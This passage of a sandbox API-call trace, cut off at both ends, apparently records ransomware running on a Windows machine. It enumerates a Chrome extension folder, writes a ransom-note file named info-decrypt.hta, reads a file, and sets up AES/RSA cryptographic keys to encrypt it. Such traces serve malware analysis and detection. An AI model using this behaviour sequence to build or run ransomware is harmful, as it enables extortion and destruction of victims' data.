dwReserved1=0x0, cFileName="0.9_0", cAlternateFileName="")) returned 0 [0201.022] FindClose (in: hFindFile=0xb7f4d0 | out: hFindFile=0xb7f4d0) returned 1 [0201.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eafc) returned 1 [0201.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb08) returned 1 [0201.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eb3c) returned 1 [0201.023] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek", nBufferLength=0x105, lpBuffer=0x949e644, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek", lpFilePart=0x0) returned 0x77 [0201.023] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\", nBufferLength=0x105, lpBuffer=0x949e618, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\", lpFilePart=0x0) returned 0x78 [0201.023] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\*", lpFindFileData=0x949e864 | out: lpFindFileData=0x949e864*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f4d0 [0201.023] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x949e874 | out: lpFindFileData=0x949e874*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85cca3f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cf0550, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cf0550, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.023] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x949e874 | out: lpFindFileData=0x949e874*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0.9_0", cAlternateFileName="")) returned 1 [0201.024] FindNextFileW (in: hFindFile=0xb7f4d0, lpFindFileData=0x949e874 | out: lpFindFileData=0x949e874*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0201.024] FindClose (in: hFindFile=0xb7f4d0 | out: hFindFile=0xb7f4d0) returned 1 [0201.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eafc) returned 1 [0201.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eb08) returned 1 [0201.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eaec) returned 1 [0201.024] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", nBufferLength=0x105, lpBuffer=0x949e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpFilePart=0x0) returned 0x7d [0201.024] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", nBufferLength=0x105, lpBuffer=0x949e5c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpFilePart=0x0) returned 0x7e [0201.024] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*", lpFindFileData=0x949e814 | out: lpFindFileData=0x949e814*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f610 [0201.742] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.742] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon_128.png", cAlternateFileName="")) returned 1 [0201.742] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon_16.png", cAlternateFileName="")) returned 1 [0201.742] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b74730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.html", cAlternateFileName="MAIN~1.HTM")) returned 1 [0201.743] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x5f, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.js", cAlternateFileName="")) returned 1 [0201.743] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="manifest.json", cAlternateFileName="MANIFE~1.JSO")) returned 1 [0201.743] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_locales", cAlternateFileName="")) returned 1 [0201.743] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85d166b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 1 [0201.743] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85d166b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 0 [0201.743] FindClose (in: hFindFile=0xb7f610 | out: hFindFile=0xb7f610) returned 1 [0201.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eaac) returned 1 [0201.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab8) returned 1 [0201.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eaec) returned 1 [0201.744] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", nBufferLength=0x105, lpBuffer=0x949e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0", lpFilePart=0x0) returned 0x7d [0201.745] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", nBufferLength=0x105, lpBuffer=0x949e5c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\", lpFilePart=0x0) returned 0x7e [0201.745] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\*", lpFindFileData=0x949e814 | out: lpFindFileData=0x949e814*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f610 [0201.745] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.745] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd2c, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon_128.png", cAlternateFileName="")) returned 1 [0201.745] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa0, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon_16.png", cAlternateFileName="")) returned 1 [0201.745] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b74730, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.html", cAlternateFileName="MAIN~1.HTM")) returned 1 [0201.745] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xe4180700, ftLastWriteTime.dwHighDateTime=0x1d03f5e, nFileSizeHigh=0x0, nFileSizeLow=0x5f, dwReserved0=0x0, dwReserved1=0x0, cFileName="main.js", cAlternateFileName="")) returned 1 [0201.746] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b9b830, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2d5, dwReserved0=0x0, dwReserved1=0x0, cFileName="manifest.json", cAlternateFileName="MANIFE~1.JSO")) returned 1 [0201.746] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x857953d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85b4d630, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85b4d630, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_locales", cAlternateFileName="")) returned 1 [0201.746] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85b998f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85d166b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85d166b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_metadata", cAlternateFileName="_METAD~1")) returned 1 [0201.746] FindNextFileW (in: hFindFile=0xb7f610, lpFindFileData=0x949e824 | out: lpFindFileData=0x949e824*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0201.746] FindClose (in: hFindFile=0xb7f610 | out: hFindFile=0xb7f610) returned 1 [0201.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eaac) returned 1 [0201.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949eab8) returned 1 [0201.747] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", nBufferLength=0x105, lpBuffer=0x949e560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", lpFilePart=0x0) returned 0x8a [0201.747] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e568, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta", lpFilePart=0x0) returned 0x8e [0201.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e9c8) returned 1 [0201.747] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x949ea44 | out: lpFileInformation=0x949ea44*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0201.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e9c4) returned 1 [0201.747] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", nBufferLength=0x105, lpBuffer=0x949e560, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", lpFilePart=0x0) returned 0x8a [0201.747] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x949e408, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta", lpFilePart=0x0) returned 0x8e [0201.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e8fc) returned 1 [0201.747] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0201.748] GetFileType (hFile=0x31c) returned 0x1 [0201.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e8f8) returned 1 [0201.748] GetFileType (hFile=0x31c) returned 0x1 [0201.748] WriteFile (in: hFile=0x31c, lpBuffer=0x37c9aec*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x949e9c0, lpOverlapped=0x0 | out: lpBuffer=0x37c9aec*, lpNumberOfBytesWritten=0x949e9c0*=0x1000, lpOverlapped=0x0) returned 1 [0201.749] WriteFile (in: hFile=0x31c, lpBuffer=0x37c9aec*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x949e994, lpOverlapped=0x0 | out: lpBuffer=0x37c9aec*, lpNumberOfBytesWritten=0x949e994*=0x55e, lpOverlapped=0x0) returned 1 [0201.749] CloseHandle (hObject=0x31c) returned 1 [0201.749] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", nBufferLength=0x105, lpBuffer=0x949e568, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", lpFilePart=0x0) returned 0x8a [0201.749] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ea14) returned 1 [0201.750] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), fInfoLevelId=0x0, lpFileInformation=0x37cab08 | out: lpFileInformation=0x37cab08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85b4d630, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85cca3f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd2c)) returned 1 [0201.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ea10) returned 1 [0201.933] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", nBufferLength=0x105, lpBuffer=0x949e454, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png", lpFilePart=0x0) returned 0x8a [0201.933] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949e948) returned 1 [0201.933] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\icon_128.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0201.934] GetFileType (hFile=0x598) returned 0x1 [0201.934] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949e944) returned 1 [0201.934] GetFileType (hFile=0x598) returned 0x1 [0201.934] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x949ea50 | out: lpFileSizeHigh=0x949ea50*=0x0) returned 0xd2c [0201.934] ReadFile (in: hFile=0x598, lpBuffer=0x36169fc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x949e9fc, lpOverlapped=0x0 | out: lpBuffer=0x36169fc*, lpNumberOfBytesRead=0x949e9fc*=0xd2c, lpOverlapped=0x0) returned 1 [0201.936] CloseHandle (hObject=0x598) returned 1 [0201.936] CryptAcquireContextW (in: phProv=0x949e99c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x949e99c*=0xbdfe98) returned 1 [0201.937] CryptGenRandom (in: hProv=0xbdfe98, dwLen=0x10, pbBuffer=0x36180c0 | out: pbBuffer=0x36180c0) returned 1 [0202.270] CryptImportKey (in: hProv=0xbdfe98, pbData=0x37a3434, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x949e96c | out: phKey=0x949e96c*=0xb7fa50) returned 1 [0202.270] CryptContextAddRef (hProv=0xbdfe98, pdwReserved=0x0, dwFlags=0x0) returned 1 [0202.270] CryptContextAddRef (hProv=0xbdfe98, pdwReserved=0x0, 